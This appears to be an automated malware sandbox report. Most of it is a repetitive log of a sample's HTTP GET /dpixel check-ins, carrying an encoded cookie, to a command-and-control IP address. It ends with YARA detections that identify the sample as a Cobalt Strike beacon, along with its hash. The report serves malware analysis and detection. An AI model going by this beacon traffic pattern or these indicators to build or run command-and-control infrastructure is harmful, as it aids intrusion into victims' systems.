                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:07 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:07 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  98192.168.2.45010142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:08 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:09 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:09 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  99192.168.2.45010242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:10 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:11 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:11 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  100192.168.2.45010342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:12 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:13 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:13 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  101192.168.2.45010442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:14 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:15 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:15 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  102192.168.2.45010542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:16 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:17 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:16 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  103192.168.2.45010642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:18 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:18 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:18 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  104192.168.2.45010742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:20 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:20 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:20 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  105192.168.2.45010842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:22 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:22 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:22 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  106192.168.2.45010942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:23 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:24 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:24 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  107192.168.2.45011042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:25 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:26 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:26 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  108192.168.2.45011142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:27 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:28 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:27 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  109192.168.2.45011242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:29 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:29 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:29 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  110192.168.2.45011342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:31 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:31 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:31 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  111192.168.2.45011442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:33 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:33 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:33 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  112192.168.2.45011542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:34 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:35 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:35 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  113192.168.2.45011642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:36 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:37 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:37 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  114192.168.2.45011742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:38 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:39 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:39 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  115192.168.2.45011842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:40 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:41 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:40 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  116192.168.2.45011942.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:42 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:43 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:42 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  117192.168.2.45012042.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:44 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:44 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:44 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  118192.168.2.45012142.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:46 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:46 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:46 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  119192.168.2.45012242.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:48 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:48 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:48 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  120192.168.2.45012342.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:50 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:50 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:50 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  121192.168.2.45012442.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:51 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:52 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:52 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  122192.168.2.45012542.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:53 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:54 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:54 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  123192.168.2.45012642.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:55 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:56 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:56 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  124192.168.2.45012742.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:58 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:55:58 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:55:58 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                  125192.168.2.45012842.192.3.1704436572C:\Users\user\Desktop\yZah650lHL.exe
                  TimestampBytes transferredDirectionData
                  2025-01-03 01:55:59 UTC352OUTGET /dpixel HTTP/1.1
                  Accept: */*
                  Cookie: Q4EwOJNXhwelWUSXnRuX9ukfIxYxlFmNJQe1xMGT1oHpYGnJ4l2CUxRI5MRs/4sXNC1xskAYZXdgkxs4WSu9fpcaKZl4jAR4B9nZAhtbj0p+FrpKFD5JM/dYXepVAbnhYLOaEr3FKSsizlTEe1NWWZVnw4PM8ezzBGSN1u07iEk=
                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
                  Host: 42.192.3.170
                  Connection: Keep-Alive
                  Cache-Control: no-cache
                  2025-01-03 01:56:00 UTC114INHTTP/1.1 200 OK
                  Date: Fri, 3 Jan 2025 01:56:00 GMT
                  Content-Type: application/octet-stream
                  Content-Length: 0


                  Statistics

                  CPU Usage

                  Click to jump to process

                  Memory Usage

                  Click to jump to process

                  System Behavior

                  General

                  Target ID:0
                  Start time:20:51:53
                  Start date:02/01/2025
                  Path:C:\Users\user\Desktop\yZah650lHL.exe
                  Wow64 process (32bit):false
                  Commandline:"C:\Users\user\Desktop\yZah650lHL.exe"
                  Imagebase:0x400000
                  File size:328'704 bytes
                  MD5 hash:5ED55475A1FE6C18C1A67FA8C7008661
                  Has elevated privileges:true
                  Has administrator privileges:true
                  Programmed in:C, C++ or other language
                  Yara matches:
                  • Rule: JoeSecurity_CobaltStrike, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: JoeSecurity_CobaltStrike_3, Description: Yara detected CobaltStrike, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                  • Rule: Windows_Trojan_CobaltStrike_ee756db7, Description: Attempts to detect Cobalt Strike based on strings found in BEACON, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_CobaltStrike_663fc95d, Description: Identifies CobaltStrike via unidentified function code, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Windows_Trojan_CobaltStrike_f0b627fc, Description: Rule for beacon reflective loader, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                  • Rule: Beacon_K5om, Description: Detects Meterpreter Beacon - file K5om.dll, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: Florian Roth
                  • Rule: CobaltStrike_Unmodifed_Beacon, Description: Detects unmodified CobaltStrike beacon DLL, Source: 00000000.00000002.4113819327.0000000000660000.00000040.00001000.00020000.00000000.sdmp, Author: yara@s3c.za.net
